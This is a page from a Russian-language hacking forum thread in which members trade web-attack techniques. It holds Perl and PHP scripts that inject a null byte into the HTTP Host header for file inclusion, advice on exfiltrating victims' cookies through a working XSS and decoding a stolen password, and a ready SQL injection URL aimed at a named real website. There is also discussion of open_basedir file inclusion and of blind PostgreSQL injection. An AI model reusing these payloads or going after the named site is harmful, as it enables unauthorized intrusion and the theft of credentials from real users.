Старый 30.04.2012, 11:53   #1981
yusmat
 
Регистрация: 08.01.2012
Сообщений: 14
Репутация: 1
По умолчанию

Цитата:
Сообщение от .Slip Посмотреть сообщение
%00 - не нулбайт, а его представление в urlencode. Только GPC проходит urldecode. Отправь скриптом, например. PHP\Perl - chr(00).

Как http заголовки повлияют на поведение сокета? Разные же уровни. То, что он вряд ли получит желаемый результат, уже другое дело, но соединению это никак не помешает.

пробовал на денвере
$_SERVER['HTTP_HOST'] переопределяеться но нул байта в ней нет
скорей всего он теряеться на уровне формирования перлом запроса



PHP код:
<?php
$file 
'/home/localhost/temp/'.$_SERVER['HTTP_HOST'].'restore.php';
//$file = '/home/localhost/temp/'.$_SERVER['HTTP_HOST'].chr(00).'restore.php';
echo ($file);
?>


Код:
#!/usr/bin/perl ;

use IO::Socket;
my $conn = new IO::Socket::INET (
                                 PeerAddr => 'localhost',
                                 PeerPort => 80,
                                 PeerProto => 'tcp',
                                 );

if (!$conn)
   {
   die "Could not create socket";
   }

print $conn "GET http://localhost/test.php HTTP/1.1\r\n";
print $conn "Host: ../../test2.php".chr(00)."\r\n";
print $conn "Connection: close\r\n\r\n";
while (<$conn>) { print; }
close $conn;
yusmat вне форума   Ответить с цитированием
Старый 01.05.2012, 07:42   #1982
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от yusmat Посмотреть сообщение
пробовал на денвере
$_SERVER['HTTP_HOST'] переопределяеться но нул байта в ней нет
скорей всего он теряеться на уровне формирования перлом запроса



PHP код:
<?php
$file 
'/home/localhost/temp/'.$_SERVER['HTTP_HOST'].'restore.php';
//$file = '/home/localhost/temp/'.$_SERVER['HTTP_HOST'].chr(00).'restore.php';
echo ($file);
?>


Код:
#!/usr/bin/perl ;

use IO::Socket;
my $conn = new IO::Socket::INET (
                                 PeerAddr => 'localhost',
                                 PeerPort => 80,
                                 PeerProto => 'tcp',
                                 );

if (!$conn)
   {
   die "Could not create socket";
   }

print $conn "GET http://localhost/test.php HTTP/1.1\r\n";
print $conn "Host: ../../test2.php".chr(00)."\r\n";
print $conn "Connection: close\r\n\r\n";
while (<$conn>) { print; }
close $conn;
PHP код:
<?php
header
("Content-Type: text/plain; charset=windows-1251");
if(isset(
$_GET['test'])){
    
var_dump($_SERVER['HTTP_HOST']);
    exit;
}

$fp = @fsockopen('127.0.0.1'80$err1$err25);
fputs($fp"GET /test3.php?test=1 HTTP/1.1\r\n" .
           
"Host: localhost" chr(00) . "test\r\n" .
           
"Connection: Close\r\n\r\n");
while(!
feof($fp)){
    print 
fgets($fp);
}
?>
Код:
HTTP/1.1 200 OK
Date: Tue, 01 May 2012 03:41:14 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 22
Connection: close
Content-Type: text/plain; charset=windows-1251

string(9) "localhost"
__________________
|
Boolean вне форума   Ответить с цитированием
Старый 01.05.2012, 22:36   #1983
Shram
 
Регистрация: 01.05.2012
Сообщений: 2
Репутация: -1
По умолчанию

в общем нашел рабочую xss , кукисы приходят, но вот вместо пароля вижу какие-то кубики вот> �;K�� когда смотришь в свои кукисы то где пароль вижу вот это %E5%3BK%ED%B4%D2
в общем сделал несколько способов чтобы декодировать это но все равно не получается. не понятных символов вижу. знаю что это защита от xss, но можно ли обойти это. один пацан сказал что пароль расшифрован в нескольких кодировках(base64,hex..) но все равно результаты мои ноль. уже неделю мучаюсь! помогите кто знал, или знает
Shram вне форума   Ответить с цитированием
Старый 01.05.2012, 23:23   #1984
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

Цитата:
Сообщение от Shram Посмотреть сообщение
в общем нашел рабочую xss , кукисы приходят, но вот вместо пароля вижу какие-то кубики вот> �;K�� когда смотришь в свои кукисы то где пароль вижу вот это %E5%3BK%ED%B4%D2
в общем сделал несколько способов чтобы декодировать это но все равно не получается. не понятных символов вижу. знаю что это защита от xss, но можно ли обойти это. один пацан сказал что пароль расшифрован в нескольких кодировках(base64,hex..) но все равно результаты мои ноль. уже неделю мучаюсь! помогите кто знал, или знает
Попробуй выслать себе не document.cookie, а encodeURIComponent(document.cookie).

И напиши подробнее, почему ты вообще ожидаешь увидеть в куках пароль? Обычно там идентицикатор сессии ловят.
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Старый 01.05.2012, 23:29   #1985
Shram
 
Регистрация: 01.05.2012
Сообщений: 2
Репутация: -1
По умолчанию

вот сайт http://maxmob.ru/jimm/?s=1&p1=">xss не получается
Shram вне форума   Ответить с цитированием
Старый 02.05.2012, 02:35   #1986
Lostnull
 
Регистрация: 15.01.2012
Сообщений: 64
Репутация: 5
По умолчанию

Shram Товарищ, где есть одна уязвимость, всегда найдется другая. Не пойму, зачем тратить неделю на изучение xss на жертве?
Авторизуемся и фигачим например http://maxmob[antigoogle]ru/smiles.php?id=4'+union+select+1,2,3,user()+--+&look_dir
mini_user@localhost
Или у тебя спортивный интерес? Тогда заливайся и смотри сорцы jimm/index.php
Lostnull вне форума   Ответить с цитированием
Старый 02.05.2012, 19:40   #1987
Lostnull
 
Регистрация: 15.01.2012
Сообщений: 64
Репутация: 5
По умолчанию

Ситуация в следующем.
Имею следующий код
PHP код:
define('ROOT_PATH','/home/httpd/vhosts/mysite.com/httpdocs');
include (
ROOT_PATH.'/inc/'.$_GET['lang'].'.php'); 
И имею open_basedir /home/httpd/vhosts/mysite.com/httpdocs:/tmp
Надо проинклудить файл из tmp, я так понимаю это нереально засчет того, что определен абсолютный путь, или я не прав?
Lostnull вне форума   Ответить с цитированием
Старый 02.05.2012, 21:43   #1988
trashmail
 
Регистрация: 08.09.2011
Сообщений: 37
Репутация: -2
По умолчанию

Цитата:
Сообщение от Lostnull Посмотреть сообщение
Ситуация в следующем.
Имею следующий код
PHP код:
define('ROOT_PATH','/home/httpd/vhosts/mysite.com/httpdocs');
include (
ROOT_PATH.'/inc/'.$_GET['lang'].'.php'); 
И имею open_basedir /home/httpd/vhosts/mysite.com/httpdocs:/tmp
Надо проинклудить файл из tmp, я так понимаю это нереально засчет того, что определен абсолютный путь, или я не прав?
Правильно понимаешь.
Если бы у тебя было
PHP код:
<? include($_GET['lang']); ?>
, то бы смог проинклудить файл из /tmp
а так, да, мешает open_basedir
trashmail вне форума   Ответить с цитированием
Старый 02.05.2012, 22:19   #1989
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

trashmail ты просто так что-ли это пишешь, я не пойму? Что бы люди лезли и проверяли?

Lostnull Всё инклудится, /tmp у тебя разрешён
__________________
------------------
Jokester вне форума   Ответить с цитированием
Старый 03.05.2012, 11:07   #1990
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

1. есть ли какое то автоматизированное средство для раскрутки слепых инъекций в PostgerSQL ? в инете ничего путного и рабочего не нашел.

2. MYSQL 4.1.12 Стандартная скуль с выводом через ошибку. Но не могу получить имя базы командой database(), user() и version() работают без проблем. Как еще можно получить имя базы, и с чем это может быть связано?
durito вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot